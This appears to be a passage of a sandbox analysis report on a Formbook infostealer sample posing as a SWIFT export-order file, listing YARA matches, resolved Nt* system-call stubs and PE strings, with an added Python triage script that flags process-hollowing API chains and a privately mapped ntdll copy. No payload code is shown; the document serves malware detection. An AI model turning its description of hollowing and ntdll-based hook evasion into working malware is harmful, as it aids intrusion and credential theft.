          Source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 0_2_00FD8250
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 0_2_00FDD2F8
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 0_2_052A5AA0
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 0_2_052A5AB0
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041C027
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_00401030
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041C196
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041C9AB
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041BB0C
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041BC18
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_00408C90
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041C575
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_00402D88
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_00402D90
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_00402FB0
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C0D20
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01491D55
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E4120
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CF900
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DD5E0
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D841F
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481002
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DB090
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FEBB0
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E6E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03032B28
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302DBD2
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_030203DA
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_0301FA2B
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02F9EBB0
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_030322AE
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02F920A0
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02F7B090
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_03021002
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_0303E824
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_030320A8
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02F84120
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_030328EC
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02F6F900
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02F86E30
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_0303DFCE
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_03031FF1
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_0302D616
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_03032EF7
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_03032D07
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_03031D55
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_030325DD
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02F7841F
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02F7D5E0
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_0302D466
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02F92581
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02F60D20
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_006CC027
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_006CC9AB
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_006CC196
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_006CBB0C
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_006CBC18
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_006B8C90
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_006B2D88
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_006B2D90
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_006B2FB0
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: String function: 013CB150 appears 32 times
          Source: C:\Windows\SysWOW64\help.exe | Code function: String function: 02F6B150 appears 45 times
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_004185F0 NtCreateFile,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_004186A0 NtReadFile,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_00418720 NtClose,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_004187D0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_0041874A NtClose,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_0041871A NtClose,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_004187CB NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_014095D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_014099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_014098F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_014097A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_014096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409560 NtWriteFile,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_0140AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_014099D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_014095F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_0140B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_014098A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409760 NtOpenProcess,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_0140A770 NtOpenThread,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_0140A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_0140A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409A10 NtQuerySection,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_014096D0 NtCreateKey,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_01409A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FAA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FAB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FAA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FAA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FAAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02FA9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_006C85F0 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_006C86A0 NtReadFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_006C8720 NtClose,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_006C87D0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_006C874A NtClose,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_006C871A NtClose,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_006C87CB NtAllocateVirtualMemory,
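          Two sets of Nt* stubs appear for each process: one at 8_2_0041xxxx / 20_2_006Cxxxx, and a second at 8_2_01409xxx / 20_2_02FA9xxx that is tagged with LdrInitializeThunk. The second set lies between the dump base addresses that the "wntdll.pdb" and "OriginalFilename ntdll.dll" rows of this report attribute to the same two processes (0x01200000 to 0x014BF000 in process 8, 0x02F40000 to 0x0305F000 in process 20), which is consistent with the loader resolving system calls from a privately mapped copy of ntdll rather than the one Windows loaded, a user-mode hook-evasion pattern. The script below is an added triage example, not Joe Sandbox code: it parses rows in the "Code function" format (the rows inline are copied from this report), reports which process-hollowing primitives each process resolves, and flags stubs that fall inside the bracketed ntdll-copy ranges. The report gives no region sizes, so bracketing by the lowest and highest dump base is an assumption.

```python
"""Triage of 'Code function' rows from a sandbox report.

Rows look like:  8_2_01409780 NtMapViewOfSection,LdrInitializeThunk,
optionally prefixed by 'Source: <image> | Code function: '.
Added example; rows and dump bases are copied from the report above.
"""
import re
from collections import defaultdict

ROW_RE = re.compile(
    r"^(?P<pid>\d+)_(?P<phase>\d+)_(?P<addr>[0-9A-Fa-f]{8})\s+(?P<apis>[A-Za-z0-9_,]+)"
)

# Stages of a classic hollowing chain; any API in a set satisfies the stage.
HOLLOWING_STAGES = [
    ("spawn target",       {"NtCreateProcessEx", "NtCreateProcess", "NtCreateUserProcess"}),
    ("unmap original",     {"NtUnmapViewOfSection"}),
    ("stage new image",    {"NtAllocateVirtualMemory", "NtMapViewOfSection"}),
    ("write payload",      {"NtWriteVirtualMemory"}),
    ("redirect execution", {"NtSetContextThread", "NtQueueApcThread"}),
    ("run",                {"NtResumeThread"}),
]

# Dump bases the report ties to the string 'wntdll.pdb', per process id.
# Assumption: the lowest and highest base bracket the mapped ntdll copy.
NTDLL_COPY_DUMPS = {
    8:  [0x01200000, 0x013A0000, 0x014BF000],
    20: [0x02F40000, 0x0305F000],
}

# Constructed input: a subset of the report's rows, some with the full prefix.
REPORT_ROWS = """
Source: C:\\Users\\user\\Desktop\\sample.exe | Code function: 8_2_004185F0 NtCreateFile,
8_2_014099D0 NtCreateProcessEx,
8_2_014097A0 NtUnmapViewOfSection,LdrInitializeThunk,
8_2_01409660 NtAllocateVirtualMemory,LdrInitializeThunk,
8_2_014098A0 NtWriteVirtualMemory,
8_2_0140AD30 NtSetContextThread,
8_2_01409950 NtQueueApcThread,
8_2_01409A20 NtResumeThread,LdrInitializeThunk,
Source: C:\\Windows\\SysWOW64\\help.exe | Code function: 20_2_006C85F0 NtCreateFile,
20_2_02FA99D0 NtCreateProcessEx,
20_2_02FA97A0 NtUnmapViewOfSection,
20_2_02FA9660 NtAllocateVirtualMemory,LdrInitializeThunk,
20_2_02FA98A0 NtWriteVirtualMemory,
20_2_02FAAD30 NtSetContextThread,
20_2_02FA9A20 NtResumeThread,
"""


def parse_rows(text):
    """Return (pid, address, [api names]) for every row that matches the format."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if "Code function:" in line:
            line = line.split("Code function:", 1)[1].strip()
        m = ROW_RE.match(line)
        if not m:
            continue
        apis = [a for a in m.group("apis").split(",") if a]
        rows.append((int(m.group("pid")), int(m.group("addr"), 16), apis))
    return rows


def hollowing_stages(rows):
    """Per pid: the hollowing stages for which at least one API stub was found."""
    seen = defaultdict(set)
    for pid, _, apis in rows:
        seen[pid].update(apis)
    return {pid: [name for name, choices in HOLLOWING_STAGES if apis & choices]
            for pid, apis in seen.items()}


def is_complete_chain(stages):
    return len(stages) == len(HOLLOWING_STAGES)


def stubs_in_ntdll_copy(rows):
    """Nt* stubs whose address falls inside a bracketed ntdll-copy range."""
    hits = []
    for pid, addr, apis in rows:
        bases = NTDLL_COPY_DUMPS.get(pid)
        if bases and min(bases) <= addr <= max(bases):
            hits.extend((pid, hex(addr), a) for a in apis if a.startswith("Nt"))
    return hits


def triage(text):
    rows = parse_rows(text)
    stages = hollowing_stages(rows)
    return {
        "stages": stages,
        "complete_chain": {pid: is_complete_chain(s) for pid, s in stages.items()},
        "stubs_in_ntdll_copy": stubs_in_ntdll_copy(rows),
    }


if __name__ == "__main__":
    for key, value in triage(REPORT_ROWS).items():
        print(key, value)
```

          The set-based check is deliberately weak on its own (legitimate loaders call several of these APIs); what makes it actionable here is the combination with the second ntdll copy, which no ordinary .NET application maps.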
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe | Binary or memory string: OriginalFilename vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.262565028.00000000007E2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameUTF8Encodi.exe. vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUI.dll@ vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263450761.0000000002C71000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameInnerException.dll" vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000003.238266998.000000000720E000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUTF8Encodi.exe. vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.265407210.0000000005C30000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameInnerException.dll" vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.265647076.0000000005F90000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameUI.dll@ vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe | Binary or memory string: OriginalFilename vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353532686.000000000164F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.352548275.00000000008F2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameUTF8Encodi.exe. vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353038587.0000000000F74000.00000040.00020000.sdmp | Binary or memory string: OriginalFilenameHelp.Exej% vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000003.264038334.000000000131F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353352126.00000000014BF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe | Binary or memory string: OriginalFilenameUTF8Encodi.exe. vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: AnsPejV.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: AnsPejV.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe | ReversingLabs: Detection: 35%
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | File read: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe:Zone.Identifier
